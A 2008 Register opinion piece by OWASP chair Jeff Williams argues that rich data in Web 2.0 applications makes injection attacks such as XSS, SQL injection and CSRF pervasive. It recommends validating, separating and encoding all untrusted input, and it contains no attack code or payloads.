Original URL: https://www.theregister.com/2008/08/01/rich_data_vulnerabilities/

Rich data: the dark side to Web 2.0 applications

With great programming comes great responsibility

By Jeff Williams

Posted in Channel, 1st August 2008 15:02 GMT

All web applications allow some form of rich data, but that rich data has become a key part of Web 2.0. Data is "rich" if it allows markup, special characters, images, formatting, and other complex syntax. This richness allows users create new and innovative content and services.

Unfortunately, richness affords attackers an unprecedented opportunity to bury attacks targeting users and systems downstream of the offending application or service supplier.

Even in the early days of Web 2.0, this is a huge problem: at least half the vulnerabilities that plague web applications and web services involve some form of injection.

The software industry already has a poor reputation for delivering software that doesn't work or contains security holes. Imagine how bad things will get in a world where people pick up vulnerabilities and hacks by connecting to dynamic web sites and "mashing up" applications.

Here are some things to bear in mind, to protect both your reputation and your users' systems and data.

Unscramble the egg

One of the oldest security principles in the book is you should always keep code and data separate. Once you mix them together, it's almost impossible separate them again. Unfortunately, most of the data formats and protocols we're using today mixing code and data like a bad DJ hashing up a cross fade. That's why injection is going to be with us for a long time.

HTML is one of the worst offenders. JavaScript code can be placed in a huge number of places with dozens of different forms and encodings - see the XSS cheatsheet for some examples. HTML allows JavaScript in the header, body, dozens of event handlers, links, CSS definitions, and style attributes.

There's no simple validation that can detect all the variants of code in all these places. However, you have to have a full security parser to validate HTML data before you can use it.

Untrusted data is code

Almost everything connected to the internet will execute data if an attacker buries the right kind of code in it. The code might be JavaScript, VB, SQL, LDAP, XPath, shell script, machine code or a hundred others depending on where that data goes.

SQL injection is just an attacker sneaking malicious SQL inside user inputs that gets concatenated into a query. Injected code isn't just a snippet anymore - it might be a huge program.

What's important to remember is that every piece of untrusted data - every form field, every URL parameter, every cookie, and every XML parameter - might contain injected code for some downstream system. If you're not absolutely sure there is no code in the data - and that's pretty much impossible - then for all you know, that data is really a little program. There is no such thing as plain old "data" anymore.

Think about HTML for a minute. We don't really "view" web pages anymore. They're programs. We "run" them in our browser. Even a tiny fragment of HTML can contain a script. Even without JavaScript, web pages can be used for a Cross-Site Request Forgery (CSRF) attacks that perform a series of functions for the attacker. That's a kind of program too.

Would you open an HTML document sent to you?

Chain-gang attack

Attackers have now started to chain these attacks and use them in multiple stages. Consider the recent massive bot attacks that used SQL injection to jam JavaScript code into all the strings in a database. The infected data gets used in a web page and the attack redirects the victim's browser to a site that installs malware. You can imagine attacks that are passed from system to system before they are ever executed and their payload is realized.

One factor that makes detecting these attacks difficult is that the web enables so many different types of encoding. There are more than 100 different character encodings, and we've added higher level encodings such as percent-encoding, HTML-entity encoding, and bbcode on top of those.

The real nightmare here is that anywhere downstream, systems may decode this data and reawaken a dormant attack. So, even if your application isn't vulnerable to injection, someone might use the data from your application or service.

As Web 2.0 continues to mashup data from different sources, the likelihood of these attacks increases.

Stamp out injection

You should view untrusted data as though it's malicious code and treat it accordingly: validate, separate, and encode.

Validate: have a whitelist input validation rule for every input - no exceptions. Not just for form fields, but hidden fields, URL parameters, headers, cookies, and all backend systems.

Separate: don't mix up the data into command strings. Wherever possible, you should use parameterized interfaces, such as PreparedStatement in Java, that prevent injection by keeping code and data separate.

Encode: encode untrusted data for the destination. One thing you absolutely have to do, but almost nobody does, is specify the character set you'll be using. Then you'll need a set of methods that apply the proper encoding for the destination, such as an HTML page, HTML attribute, JavaScript, XPath query, LDAP query and so on.

Show you care

Injection is not a new problem - we've known about it for decades. The body of knowledge on XSS and SQL injection is extensive. If your system forwards an attack to an innocent victim, though, you not only make yourself look bad but in the Web 2.0 world there's a chance your software will lead to wider a proliferation of attacks than was possible in the bad old days.

Jeff Williams is the founder and CEO of Aspect Security and the volunteer chair of the Open Web Application Security Project. His latest project is the Enterprise Security API, a free and open set of foundational security building blocks for developers.